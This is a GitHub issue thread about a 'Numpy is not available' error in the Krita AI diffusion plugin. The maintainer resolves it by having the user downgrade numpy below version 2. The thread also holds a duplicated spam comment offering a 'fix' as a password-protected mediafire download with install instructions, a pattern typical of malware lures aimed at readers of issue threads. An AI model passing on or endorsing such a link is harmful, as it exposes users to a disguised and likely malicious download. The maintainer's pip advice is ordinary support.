### ISSUE TITLE
Numpy is not available

### ISSUE THREAD

**Issue by AnnoyingBarnacle422** [Acly/krita-ai-diffusion#1130]
When trying to circle a region and putting in a prompt and clicking "Fill" I get the following feedback

`Server execution error: Numpy is not available`

When
 looking in the path that the plugin was installed to, I found the numpy folder and looked in version.py. It stated it was using 2.1.0
`C:\Users\user\3D Objects\stable_folder\ComfyUI\python\Lib\site-packages\numpy`

I have attatched the client.log and server.log

I am running the following
Krita 5.2.2
Plugin: 1.22.0
Windows 10 22H2
GPU: Radeon RX 7900 XTX

[client.log](https://github.com/user-attachments/files/16823481/client.log)
[server.log](https://github.com/user-attachments/files/16823482/server.log)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Acly** [comment]
I think torch isn't compatible with numpy version 2 yet

I'm using 1.26.4, and that's also what I get from the plugin installer. Not quite sure yet how you ended up with 2.1

To downgrade:
```
C:\Users\user\3D Objects\stable_folder\ComfyUI\python\python.exe -m pip install numpy<2
```

**Comment by AnnoyingBarnacle422** [comment]
This fixed the issue, thank you!
